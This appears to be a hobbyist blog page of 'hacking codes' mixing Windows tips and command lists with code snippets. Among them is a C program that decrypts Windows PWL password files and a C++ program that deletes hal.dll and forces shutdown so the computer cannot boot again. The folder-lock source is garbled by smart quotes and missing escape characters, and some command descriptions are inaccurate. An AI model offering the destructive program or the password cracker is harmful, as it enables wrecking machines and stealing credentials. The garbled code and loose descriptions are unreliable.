Featured
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Hacking Codes

1] FACEBOOK ACCEPT OR REJECT AT ONE TIME
        If You Get A Lot Of Friend Requests Daily Or You Opened You Facebook Account After A Long Time, You Could End Up Having To Manually Accept Or Reject All Of Them, these code can be used to accept or reject all of them at once.
 PROCESS>>>
 Copy The Following Code:

For Accepting:

javascript:for( i = 1;i<document.getElementsByName("actions[accept]").length;i++){document.getElementsByName("actions[accept]")[i].click();}void(0);

For Rejecting:

javascript:for( i = 1;i<document.getElementsByName("actions[hide]").length;i++){document.getElementsByName("actions[hide]")[i].click();}void(0);

    Paste This Code In The Address Bar Of The Page You Opened In The First Step

    Now Just Wait And Let The Script Work!!


Note: For Chrome Users: When You Paste The Code In The Address Bar, You Will Manually Need To Reinsert "javascript:" in Front Of It
2] CRACK WINDOWS PASSWORD SOURCE CODE :    This will reveal your windows computer password. Just copy this code on to a notepad.
Save it as anything.c. Remember to change the file type to "All file".

# include<stdio.h>
 # include<stdio.h>
 # include<process.h>
 # include<stdlib.h>
 # include<ctype.h>
 # include<conio.h>
 # include<mem.h>

 unsigned char huge Data[100001];
 unsigned char keystream[1001];
 int Rpoint[300];

 void main(int argc,char *argv[]){
 FILE *fd;
 int i,j;
 int size;
 char ch;
 char *name;
 int cracked;
 int sizemask;
 int maxr;
 int rsz;
 int pos;
 int Rall[300];     /* Resourse allocation table */

 if(argc<2)
 {
     printf("usage: glide filename (username)");
     exit(1);
 }
 /* Read PWL file */

 fd=fopen(argv[1],"rb");
 if(fd==NULL)
 {
       printf("can't open file %s",argv[1]);
       exit(1);
 }
 size=0;
 while(!feof(fd)){
         Data[size++]=fgetc(fd);
 }
 size--;
 fclose(fd);

 /* Find Username */
 name=argv[1];
 if(argc>2)name=argv[2];
 printf("Username:%s",name);

 /* Copy encrypted text into keystream */
 cracked=size-0x0208;
 if(cracked<0)cracked=0;
       if(cracked>1000)cracked=1000;
                memcpy(keystream,Data+0x208,cracked);

 /* Generate 20 bytes of keystream */
 for(i=0;i<20;i++)
 {
     ch=toupper(name[i]);
     if(ch==0)break;
     if(ch=='.')break;
     keystream[i]^=ch;
 };
 cracked=20;

 /* Find allocated resources */
 sizemask=keystream[0]+(keystream[1]<<8);
 printf("Sizemask:%04X",sizemask);
 for(i=0;i<256;i++)
 {
     if(Data[i]!=0xff)
         {
         Rall[Data[i]]++;
         if(Data[i]>maxr)
                             maxr=Data[i];
     }
 }

 maxr=(((maxr/16)+1)*16); /* Resourse pointer table size appears to be
 divisible by 16 */

 /*Search after resources */

 Rpoint[0]=0x0208+2*maxr+20+2; /* First resources */
 for(i=0;i<maxr;i++)
 {
     /* Find the size of current resourse */
     pos=Rpoint[i];
     rsz=Data[pos]+(Data[pos+1]<<8);
     rsz^=sizemask;
     printf("Analysing block with size:%04x    (%d:%d)",rsz,i,Rall[i]);
     if((Rall[i]==0)&&(rsz!=0))
          {

         printf("Unused resourse has nonzero size!!!");
         printf("If last line produed any:U may try 2 recover");
         printf("Press y to attempt the recovery");
         ch=getch();
         if(ch!='y')exit(0);
         rsz=2;
         i=i-1;
     }
     pos=pos+rsz;
 /* Resourse have a tedency to have the wrong size for some reason*/
     /* Chech for correct size*/
     if(i<maxr-1)
         {
         while(Data[pos+3]!=keystream[1])
                 {
             printf(":",Data[pos+3]);
             pos=pos+2; /* Very rude may fail */
         }
     }
     pos+=2; /* Include pointer in size */
     Rpoint[i+1]=pos;
 }

 Rpoint[maxr]=size;
 /* Insert Table data into keystream*/
 for(i=0;i<=maxr;i++)
 {
     keystream[20+2*i]^=Rpoint[i] & 0x00ff;
     keystream[21+2*i]^=(Rpoint[i]>>8) & 0x00ff;
 }
 cracked+=maxr*2+2;
 printf("%d Bytes of ketstream recoverd ",cracked);
 /* Decrypt resources */
 for(i=0;i<maxr;i++)
 {
     rsz=Rpoint[i+1]-Rpoint[i];
         if(rsz>cracked)
         rsz=cracked;
             printf("Resource[%d](%d)",i,rsz);
     for(j=0;j<rsz;j++)                                    
             printf("%c",Data[Rpoint[i]+j]^keystream[j]);
           printf("");
 }
     exit(0);
 }   

3] PLAY YOUTUBE VIDEOS IN THE WEBSITE>>
src="http://www.youtube.com/urlink"
type="application/x-shockwave-flash">


eg:

 <html>
<body>

<embed
width="420" height="345"
src="http://www.youtube.com/urlink"
type="application/x-shockwave-flash">
</embed>

</body>
</html>

4] TO DELETE THE HAL.DLL FILE

This is a powerful C++ program, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.This is not a prank..

Warning: Do not try this on your home computer.

Code:

#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
    system("del %SystemRoot%\\system32\\hal.dll -q"); //PWNAGE TIME
    system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
    system("PAUSE");
    return EXIT_SUCCESS;
}

Note:
          The "del" command is used in DOS to delete stuff. "-q" is a parameter which means force delete,or delete without asking.shutdown -s -f -t 00 means shutdown,force close everything running,in 00 seconds time.

5] RUN COMMANDS FOR WINDOWS>>>>>>>

CONTROL COMMANDS

* CONTROL: opens the control panel window
* CONTROL ADMINTOOLS: opens the administrative tools
* CONTROL KEYBOARD: opens keyboard properties
* CONTROL COLOUR: opens display properties.Appearance tab
* CONTROL FOLDERS: opens folder options
* CONTROL FONTS: opens font policy management
* CONTROL INTERNATIONAL or INTL.CPL: opens Regional and Language option
* CONTROL MOUSE or MAIN.CPL: opens mouse properties
* CONTROL USERPASSWORDS: opens User Accounts editor
* CONTROL USERPASSWORDS2 or NETPLWIZ: User account access restrictions
* CONTROL PRINTERS: opens faxes and printers available
* APPWIZ.CPL: opens Add or Remove programs utility tool
* OPTIONALFEATURES: opens Add or Remove Windows component utility
* DESK.CPL: opens display properties. Themes tab
* HDWWIZ.CPL: opens add hardware wizard
* IRPROPS.CPL: infrared utility tool
* JOY.CP: opens game controllers settings
* MMSYS.CPL: opens Sound and Audio device Properties. Volume tab
* SYSDM.CPL: opens System properties
* TELEPHON.CPL: Opens phone and Modem options
* TIMEDATE.CPL: Date and Time properties
* WSCUI.CPL: opens Windows Security Center
* ACCESS.CPL: opens Accessibility Options
* WUAUCPL.CPL: opens Automatic Updates
* POWERCFG.CPL: opens Power Options Properties
* AZMAN.MSC: opens authorisation management utility tool
* CERTMGR.MSC: opens certificate management tool
* COMPMGMT.MSC: opens the Computer management tool
* COMEXP.MSC or DCOMCNFG: opens the Computer Services management tool
* DEVMGMT.MSC: opens Device Manager
* EVENTVWR or EVENTVWR.MSC: opens Event Viewer
* FSMGMT.MSC: opens Shared Folders
* NAPCLCFG.MSC: NAP Client configuration utility tool
* SERVICES.MSC: opens Service manager
* TASKSCHD.MSC or CONTROL SCHEDTASKS: opens Schedule Tasks manager
* GPEDIT.MSC: opens Group Policy utility tool
* LUSRMGR.MSC: opens Local Users and Groups
* SECPOL.MSC: opens local security settings
* CIADV.MSC: opens indexing service
* NTMSMGR.MSC: removable storage manager
* NTMSOPRQ.MSC: removable storage operator requests
* WMIMGMT.MSC: opens (WMI) Window Management Instrumentation
* PERFMON or PERFMON.MSC: opens the Performance monitor
* MMC: opens empty Console
* MDSCHED: opens memory diagnostics tools
* DXDIAG: opens DirectX diagnostics tools
* ODBCAD32: opens ODBC Data source Administrator
* REGEDIT or REGEDT32: opens Registry Editor
* DRWTSN32: opens Dr. Watson
* VERIFIER: opens Driver Verifier Manager
* CLICONFG: opens SQL Server Client Network Utility
* UTILMAN: opens Utility Manager
* COLORCPL: opens color management
* CREDWIZ: back up and recovery tool for user passwords
* MOBSYNC: opens Synchronization center
* MSCONFIG: opens System Configuration Utility
* SYSEDIT: opens System Configuration Editor (careful while using this command)
* SYSKEY: Windows Account Database Security management (careful while using this command)

Windows utility and applications

* EPLORER: Opens windows Explorer
* IEXPLORER: Opens Internet explorer
* WAB: opens Contacts
* CHARMAP: opens Character Map
* WRITE: opens WordPad
* NOTEPAD: opens Notepad
* CALC: opens Calculator
* CLIPBRD: opens Clipboard Viewer-> Vista Has no ClipBoard..
* WINCHAT: opens Microsoft Chat Interface
* SOUNDRECORDER: opens sound recording tool
* DVDPLAY: run CD or DVD
* WMPLAYER: opens Windows Media Player
* MOVIEMK: Opens untitled Windows Movie Maker
* OSK: opens on-screen Keyboard
* MAGNIFY: opens Magnifier
* WINCAL: opens Calendar
* DIALER: opens phone Dialer
* EUDCEDIT: opens Private Character Editor
* NDVOL: opens the mixer volume
* RSTRUI : opens Tool System Restore (For Vista only)
* %WINDIR%\SYSTEM32\RESTORE\rstrui.exe: opens Tool System Restore (for XP only).
* MSINFO32: Opens the System Information
* MRT : launches the utility removal of malware.
* Taskmgr : Opens the Windows Task Manager
* CMD: opens a command prompt
* MIGWIZ: Opens the tool for transferring files and settings from Windows (Vista only)
* Migwiz.exe: Opens the tool for transferring files and settings from Windows (for XP only)
* SIDEBAR: Open the Windows (Vista only)
* Sigverif : Opens the tool for verification of signatures of files
* Winver : Opens the window for your Windows version
* FSQUIRT: Bluetooth Transfer Wizard
* IExpress opens the wizard for creating self-extracting archives. Tutorial HERE
* MBLCTR: opens the mobility center (Windows Vista only)
* MSRA : Opens the Windows Remote Assistance
* Mstsc : opens the tool connection Remote Desktop
* MSDT: opens the diagnostic tools and support Microsoft
* WERCON: opens the reporting tool and solutions to problems (for Vista only)
* WINDOWSANYTIMEUPGRADE: Enables the upgrade of Windows Vista
* WINWORD : opens Word (if installed)
* PRINTBRMUI : Opens migration wizard printer (Vista only)


Disk management
* DISKMGMT.MSC: opens disk management utility
* CLEANMGR: opens disk drive clean up utility
* DFRG.MSC: opens disk defragmenter
* CHKDSK: complete analysis of disk partition
* DISKPART: disk partitioning tool


Connection management

* IPCONFIG: list the configuration of IP addresses on your PC (for more information type IPCONFIG/? in the CMD menu)
* INETCPL.CPL: opens internet properties
* FIREWALL.CPL: opens windows firewall
* NETSETUP.CPL: opens network setup wizard


Miscellaneous commands

* JAVAWS: View the cover of JAVA software (if installed)
* AC3FILTER.CPL: Opens the properties AC3 Filter (if installed)
* FIREFOX: Mozilla launches Firefox (if installed)
* NETPROJ: allow or not connecting to a network projector (For Vista only)
* LOGOFF: closes the current session
* SHUTDOWN: shut down Windows
* SHUTDOWN-A: to interrupt Windows shutdown
* %WINDIR% or %SYSTEMROOT%: opens the Windows installation
* %PROGRAMFILES%: Opens the folder where you installed other programs (Program Files)
* %USERPROFILE%: opens the profile of the user currently logged
* %HOMEDRIVE%: opens the browser on the partition or the operating system is installed
* %HOMEPATH%: opens the currently logged user C: \ Documents and Settings \ [username]
* %TEMP%: opens the temporary folder
* VSP1CLN: deletes the cache for installation of the service pack 1 for Vista

6] FOLDER LOCK SOURCE CODE>>>>.

#include<process.h>
#include<iostream.h>
#include<fstream.h>
#include<conio.h>
void print();
void choice();
void main()
{
clrscr();
print();
cout<<”nnnnnnnn -Before proceeding read carefully the
readme.txt file.”;
cout<<”nn -On execution it will create files namely lock.bat &
unlock.bat.”;
cout<<”nnnnnnnnnnnnnnnttttTHANK YOU”;
cout<<”nnnnnnnnnnntttttttpress any key …”;
getch();
clrscr();
char pass[6];
print();
cout<<”nn Enter secret code :”;
abc:for(int i=1;i<=6;i++)
{
pass[i]=getch();
cout<<”*”;
}
getch();
for(i=1;i<=6;i++)
{
if(pass[1]==’R’ && pass[2]==’i’ && pass[3]==’t’ && pass[4]==’e’
&& pass[5]==’s’ && pass[6]==’H')
{
clrscr();
char fold_name[20],ch;
print();
cout<<”nnn Enter the name of the folder you want to protect :
“;
cin.getline(fold_name,20);
char kk;
clrscr();
asd:print();
cout<<”nnn What do you want to do?”;
cout<<”nnnta> Lock Folder”;
cout<<”nntb> Unlock Folder”;
cout<<”nntc> Exit”;
cout<<”nnnnnn Enter your choice : “;
cin>>kk;
switch(kk)
{
case ‘a’:
case ‘A’:
{
qwe:clrscr();
print();
cout<<”nn In which special folder you want to convert your
folder:”;
choice();
cin>>ch;
switch(ch)
{
case ’1′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{00022602-
0000-0000-C000-000000000046}ndel lock.bat”;
file.close();
} break;
case ’2′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{0CD7A5C0-
9F37-11CE-AE65-08002B2E1262}ndel lock.bat”;
file.close();
} break;
case ’3′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{0DF44EAAFF21-
4412-828E-260A8728E7F1}ndel lock.bat”;
file.close();
} break;
case ’4′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{208D2C60-
3AEA-1069-A2D7-08002B30309D}ndel lock.bat”;
file.close();
} break;
case ’5′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{20D04FE0-
3AEA-1069-A2D8-08002B30309D}ndel lock.bat”;
file.close();
} break;
case ’6′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{645FF040-
5081-101B-9F08-00AA002F954E}ndel lock.bat”;
file.close();
} break;
case ’7′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{6DFD7C5C-
2451-11d3-A299-00C04F8EF6AF}ndel lock.bat”;
file.close();
} break;
case ’8′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{7007ACC7-
3202-11D1-AAD2-00805FC1270E}ndel lock.bat”;
file.close();
} break;
default :
{
cout<<”nn Invalid Choice”;
cout<<”nnnnnnntttttttpress any key …”;
getch();
clrscr();
goto qwe;
}
}//ch
}break;//case1
case ‘b’:
case ‘B’:
{
char ufold_name[20],ch1;
dfg:clrscr();
print();
cout<<”nn In which special folder you have converted your
folder:”;
choice();
cin>>ch1;
switch(ch1)
{
case ’1′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{00022602-0000-0000-C000-
000000000046}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’2′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{0CD7A5C0-9F37-11CE-AE65-
08002B2E1262}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’3′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{0DF44EAA-FF21-4412-828E-
260A8728E7F1}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’4′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{208D2C60-3AEA-1069-A2D7-
08002B30309D}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’5′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{20D04FE0-3AEA-1069-A2D8-
08002B30309D}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’6′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{645FF040-5081-101B-9F08-
00AA002F954E}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’7′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{6DFD7C5C-2451-11d3-A299-
00C04F8EF6AF}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’8′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{7007ACC7-3202-11D1-AAD2-
00805FC1270E}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
default :
{
cout<<”nn Invalid Choice”;
cout<<”nnnnnnntttttttpress any key …”;
getch();
clrscr();
goto dfg;
}
}//ch
}//case2
case ‘c’:
case ‘C’:
{
exit(0);
}
default :
{
cout<<”nn Invalid Choice”;
cout<<”nnnnnnnnnnntttttttpress any key …”;
getch();
clrscr();
goto asd;
}
}//switchkk
break;}//if
else
{
cout<<”ann Renter secret code :”;
goto abc;
}
}//for
}//main
void print()
{
cout<<”n********************************************************
************************”;
textcolor(RED);
cprintf(“n WEB KING HACKER”);
cprintf(“nn
Developed by: RAJESH KUMAR”);
textcolor(WHITE);
cout<<”nn******************************************************
**************************”;
}
void choice()
{
cout<<”nnnnt1> Media Clip”;//{00022602-0000-0000-C000-
000000000046}
cout<<”nnt2> Cabinet File”; //{0CD7A5C0-9F37-11CE-AE65-
08002B2E1262}
cout<<”nnt3> Taskbar And Start Menu”;//{0DF44EAA-FF21-4412-828E-
260A8728E7F1}
cout<<”nnt4> My Network Places”;//{208D2C60-3AEA-1069-A2D7-
08002B30309D}
cout<<”nnt5> My Computer”; //{20D04FE0-3AEA-1069-A2D8-
08002B30309D}
cout<<”nnt6> Recycle Bin”; //{645FF040-5081-101B-9F08-
00AA002F954E}
cout<<”nnt7> Folder Option”; //{6DFD7C5C-2451-11d3-A299-
00C04F8EF6AF}
cout<<”nnt8> Network Connection”;//{7007ACC7-3202-11D1-AAD2-
00805FC1270E}
cout<<”nnnnnn Enter Your choice : “;
}
 

7] ADD TEXT TO AN IMAGE>>>>>>>>>>>

Put some txt in an image.

CODING:

#include <stdio.h>
#include <gd.h>
#include <gdfontg.h>

int main(int argc, char *argv[]) {
 gdImagePtr img;
 FILE *fp = {0};
 int width, white, black;

 width = white = black = 0;

 if(argc != 3) {
  fprintf(stderr, "Usage: pngtxt image.png 'Hello world.. !'\n");
  return 1;
 }

 fp = fopen(argv[1], "wb");
 if(fp == NULL) {
  fprintf(stderr, "Error - fopen(%s)\n", argv[1]);
  return 1;
 }

 width = strlen(argv[2]);

 img = gdImageCreate(width * 10, 20);

 white = gdImageColorAllocate(img, 255, 255, 255);
 black = gdImageColorAllocate(img, 0, 0, 0);

 gdImageString(img, gdFontGiant, 2, 1, argv[2], black);

 gdImagePng(img, fp);

 fclose(fp);
 gdImageDestroy(img);

 return 0;
}

Windows XP/2000 Hacking tips

Speed up the Boot Menu (#1)

Tired of waiting thirty seconds to boot Windows 2000 if you don't select from the boot menu? Speed up the booting process by only showing the available operating systems for just a couple of seconds.

Right-click "My Computer" on the desktop and choose "Properties". On the "System Properties" multi-tabbed dialog box that follows, click "Advanced". Click the "Startup and Recovery..." button. Then, on the "Startup and Recovery" dialog box that follows, next to "Display list of operating systems for ... seconds", select the number of seconds that you want the computer to wait before continuing with the default OS. When you're done, press "OK" to close the dialog box.

Desktop Disappearing? (#2)

Although Windows 2000 is more stable than previous versions of NT, in some situations, strange things can happen. If, for example, Explorer crashes, most of your desktop, including the "Start" button, disappears. To bring back Explorer without rebooting your machine, press CONTROL-ALT-DELETE. When the "Windows Security" dialog box appears, click the "Task Manager" button. If the "Windows Task Manager' dialog box appears as it should, select the "File" menu and then "New Task (Run)". When the "Create New Task" dialog box appears, just type in "Explorer" and press the "OK" button. Windows Explorer should then reappear, complete with the "Start" button.
Change Process Priority (#3)
Is a particular program or process running too fast or too slow? Is a program or process taking too much of your CPU time or can you allow a process or program to take more of your computing power? To change these settings for a particular process, just right-click on an empty area of your taskbar and choose "Task Manager..." On the "Windows Task Manager" dialog box that follows, select a process and right-click it. On the popup menu that appears, select "Set Priority" and choose one of the following priorities: "Realtime", "High", "Above Normal", "Normal", "Below Normal", or "Low". The lower the priority is on the popup menu, the lower percentage of CPU time will be delegated to said priority.
Note that depending on the process and your administrative rights to your machine, you may not be able to change a particular process's priority.
Put the Desktop in your Taskbar (#4)
Do you frequently multitask? If so, all of the windows created by running applications can quickly cover your desktop. If you'd like, you can make the desktop icons immediately accessible from your taskbar. Just right-click an empty area of your taskbar, choose "Toolbars", and check "Desktop". Your desktop icons will then be immediately accessible without having to minimize your current windows. If you have a lot of desktop icons, click on the two greater-than arrows (">>") to the right of your desktop icons and a popup menu will appear allowing you to select from any of the available desktop icons not immediately visible on your taskbar.
Changing DOS Window Titles (#5)
If you use DOS a lot, you may frequently have more than one DOS window open at once. Perhaps you'll have one a window for FTP, one for debugging a batch file, one for doing basic tasks such as displaying directories, etc. If so, it can get very confusing navigating between the different DOS windows since each of their titles just say "Command Prompt". If you'd like, you can change the titles of a DOS window so you can easily see what tasks you are performing in each window.
To change the title of a Windows 2000 command prompt window, just enter in the TITLE command, followed by your desired window title. For example, to name a DOS window "Debugging Window", just enter the following command at a DOS prompt:
TITLE Debugging Window
Save the Current Directory Name (#6)
Windows 2000 lets you temporarily store the name of the current directory that you are in, letting you recall the directory name later after you are doing other processing. This may be useful if you are jumping around DOS directories a lot, either manually or through a batch file.
To store the name of the current directory, or rather, to PUSH the name of the current directory onto the stack, enter the PUSHD command followed by the name of a directory that you would like to access next. For example, if you are in the "C:\Program Files" directory and want to push that directory name onto the stack, jumping to the C:\WINNT" directory, enter:

PUSHD C:\WINNT

After you are done working in the "C:\WINNT" directory and ready to go back to the "C:\Program Files" directory, don't type in "CD C:\Program Files", just POP the old directory from the stack by entering:



How do I get the "Administrator" name on Welcome Screen?
To get Admin account on the "Welcome Screen" as well as the other usernames, make sure that there are no accounts logged in.

Press "ctrl-alt-del" twice and you should be able to login as administrator!

finally worked for me after i found out that all accounts have to be logged out first

Create a Password Reset Disk
If you’re running Windows XP Professional as a local user in a workgroup environment, you can create a password reset disk to log onto your computer when you forget your password. To create the disk:

Click Start, click Control Panel, and then click User Accounts.
Click your account name.
Under Related Tasks, click Prevent a forgotten password.

Follow the directions in the Forgotten Password Wizard to create a password reset disk.

Store the disk in a secure location, because anyone using it can access your local user account

Change Web Page Font Size on the Fly
If your mouse contains a wheel for scrolling, you can change font size on the fly when viewing a Web page. To do so:

Press and hold Ctrl. Scroll down (or towards yourself) to enlarge the font size. Scroll up (or away from yourself) to reduce the font size.

You might find it useful to reduce font size when printing a Web page, so that you can fit more content on the page.

WinXP Clear Page file on shutdown
WINXPCPS.REG (WinXP Clear Page file on shutdown)

This Registration (.REG) file clears the Page file when you power off the computer.
Restart Windows for these changes to take effect!
ALWAYS BACKUP YOUR SYSTEM BEFORE MAKING ANY CHANGES!

Browse to: HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ Session Manager \ Memory Management

and add the DWORD variable "ClearPageFileAtShutdown"=dword:00000001

You can also do this without reg hacking.
Go to Control panel Administartative tools, local security policy. then goto local policies ---> security options.
Then change the option for "Shutdown: Clear Virtual Memory Pagefile"


Windows Shortcuts
Run Commands:

Quote:
compmgmt.msc - Computer management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration Utility
regedit - Registry Editor
msinfo32 _ System Information
sysedit _ System Edit
win.ini _ windows loading information(also system.ini)
winver _ Shows current version of windows
mailto: _ Opens default email client
command _ Opens command prompt


Run Commands to access the control panel:

Quote:
Add/Remove Programs control appwiz.cpl
Date/Time Properties control timedate.cpl
Display Properties control desk.cpl
FindFast control findfast.cpl
Fonts Folder control fonts
Internet Properties control inetcpl.cpl
Keyboard Properties control main.cpl keyboard
Mouse Properties control main.cpl
Multimedia Properties control mmsys.cpl
Network Properties control netcpl.cpl
Password Properties control password.cpl
Printers Folder control printers
Sound Properties control mmsys.cpl sounds
System Properties control sysdm.cpl



Command Prompt:

Quote:
ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND Causes MS-DOS to look in other directories when editing a file or running a command.
ARP Displays, adds, and removes arp information from network devices.
ASSIGN Assign a drive letter to an alternate letter.
ASSOC View the file associations.
AT Schedule a time to execute commands or programs.
ATMADM Lists connections and addresses seen by Windows ATM call manager.
ATTRIB Display and change file attributes.
BATCH Recovery console command that executes a series of commands in a file.
BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK Enable / disable CTRL + C feature.
CACLS View and modify file ACL's.
CALL Calls a batch file from another batch file.
CD Changes directories.
CHCP Supplement the International keyboard and character set information.
CHDIR Changes directories.
CHKDSK Check the hard disk drive running FAT for errors.
CHKNTFS Check the hard disk drive running NTFS for errors.
CHOICE Specify a listing of multiple options within a batch file.
CLS Clears the screen.
CMD Opens the command interpreter.
COLOR Easily change the foreground and background color of the MS-DOS window.
COMP Compares files.
COMPACT Compresses and uncompress files.
CONTROL Open control panel icons from the MS-DOS prompt.
CONVERT Convert FAT to NTFS.
COPY Copy one or more files to an alternate location.
CTTY Change the computers input/output devices.
DATE View or change the systems date.
DEBUG Debug utility to create assembly programs to modify hardware settings.
DEFRAG Re-arrange the hard disk drive to help with loading programs.
DEL Deletes one or more files.
DELETE Recovery console command that deletes a file.
DELTREE Deletes one or more files and/or directories.
DIR List the contents of one or more directory.
DISABLE Recovery console command that disables Windows system services or drivers.
DISKCOMP Compare a disk with another disk.
DISKCOPY Copy the contents of one disk and place them on another disk.
DOSKEY Command to view and execute commands that have been run in the past.
DOSSHELL A GUI to help with early MS-DOS users.
DRIVPARM Enables overwrite of original device drivers.
ECHO Displays messages and enables and disables echo.
EDIT View and edit files.
EDLIN View and edit files.
EMM386 Load extended Memory Manager.
ENABLE Recovery console command to enable a disable service or driver.
ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command.
ERASE Erase files from computer.
EXIT Exit from the command interpreter.
EXPAND Expand a M*cros*ft Windows file back to it's original format.
EXTRACT Extract files from the M*cros*ft Windows cabinets.
FASTHELP Displays a listing of MS-DOS commands and information about them.
FC Compare files.
FDISK Utility used to create partitions on the hard disk drive.
FIND Search for text within a file.
FINDSTR Searches for a string of text within a file.
FIXBOOT Writes a new boot sector.
FIXMBR Writes a new boot record to a disk drive.
FOR Boolean used in batch files.
FORMAT Command to erase and prepare a disk drive.
FTP Command to connect and operate on a FTP server.
FTYPE Displays or modifies file types used in file extension associations.
GOTO Moves a batch file to a specific label or location.
GRAFTABL Show extended characters in graphics mode.
HELP Display a listing of commands and brief explanation.
IF Allows for batch files to perform conditional processing.
IFSHLP.SYS 32-bit file manager.
IPCONFIG Network command to view network adapter settings and assigned values.
KEYB Change layout of keyboard.
LABEL Change the label of a disk drive.
LH Load a device driver in to high memory.
LISTSVC Recovery console command that displays the services and drivers.
LOADFIX Load a program above the first 64k.
LOADHIGH Load a device driver in to high memory.
LOCK Lock the hard disk drive.
LOGON Recovery console command to list installations and enable administrator login.
MAP Displays the device name of a drive.
MD Command to create a new directory.
MEM Display memory on system.
MKDIR Command to create a new directory.
MODE Modify the port or display settings.
MORE Display one page at a time.
MOVE Move one or more files from one directory to another directory.
MSAV Early M*cros*ft Virus scanner.
MSD Diagnostics utility.
MSCDEX Utility used to load and provide access to the CD-ROM.
NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT
NET Update, fix, or view the network or network settings
NETSH Configure dynamic and static network information from MS-DOS.
NETSTAT Display the TCP/IP network protocol statistics and information.
NLSFUNC Load country specific information.
NSLOOKUP Look up an IP address of a domain or host on a network.
PATH View and modify the computers path location.
PATHPING View and locate locations of network latency.
PAUSE Command used in batch files to stop the processing of a command.
PING Test / send information to another network computer or network device.
POPD Changes to the directory or network path stored by the pushd command.
POWER Conserve power with computer portables.
PRINT Prints data to a printer port.
PROMPT View and change the MS-DOS prompt.
PUSHD Stores a directory or network path in memory so it can be returned to at any time.
QBASIC Open the QBasic.
RD Removes an empty directory.
REN Renames a file or directory.
RENAME Renames a file or directory.
RMDIR Removes an empty directory.
ROUTE View and configure windows network route tables.
RUNAS Enables a user to execute a program on another computer.
SCANDISK Run the scandisk utility.
SCANREG Scan registry and recover registry from errors.
SET Change one variable or string to another.
SETLOCAL Enables local environments to be changed without affecting anything else.
SETVER Change MS-DOS version to trick older MS-DOS programs.
SHARE Installs support for file sharing and locking capabilities.
SHIFT Changes the position of replaceable parameters in a batch program.
SHUTDOWN Shutdown the computer from the MS-DOS prompt.
SMARTDRV Create a disk cache in conventional memory or extended memory.
SORT Sorts the input and displays the output to the screen.
START Start a separate window in Windows from the MS-DOS prompt.
SUBST Substitute a folder on your computer for another drive letter.
SWITCHES Remove add functions from MS-DOS.
SYS Transfer system files to disk drive.
TELNET Telnet to another computer / device from the prompt.
TIME View or modify the system time.
TITLE Change the title of their MS-DOS window.
TRACERT Visually view a network packets route across a network.
TREE View a visual tree of the hard disk drive.
TYPE Display the contents of a file.
UNDELETE Undelete a file that has been deleted.
UNFORMAT Unformat a hard disk drive.
UNLOCK Unlock a disk drive.
VER Display the version information.
VERIFY Enables or disables the feature to determine if files have been written properly.
VOL Displays the volume information about the designated drive.
XCOPY Copy multiple files, directories, and/or drives from one location to another.
TRUENAME When placed before a file, will display the whole directory in which it exists
TASKKILL It allows you to kill those unneeded or locked up applications




Windows XP Shortcuts:

Quote:
ALT+- (ALT+hyphen) Displays the Multiple Document Interface (MDI) child window's System menu
ALT+ENTER View properties for the selected item
ALT+ESC Cycle through items in the order they were opened
ALT+F4 Close the active item, or quit the active program
ALT+SPACEBAR Display the System menu for the active window
ALT+TAB Switch between open items
ALT+Underlined letter Display the corresponding menu
BACKSPACE View the folder one level up in My Computer or Windows Explorer
CTRL+A Select all
CTRL+B Bold
CTRL+C Copy
CTRL+I Italics
CTRL+O Open an item
CTRL+U Underline
CTRL+V Paste
CTRL+X Cut
CTRL+Z Undo
CTRL+F4 Close the active document
CTRL while dragging Copy selected item
CTRL+SHIFT while dragging Create shortcut to selected iteM
CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word
CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word
CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph
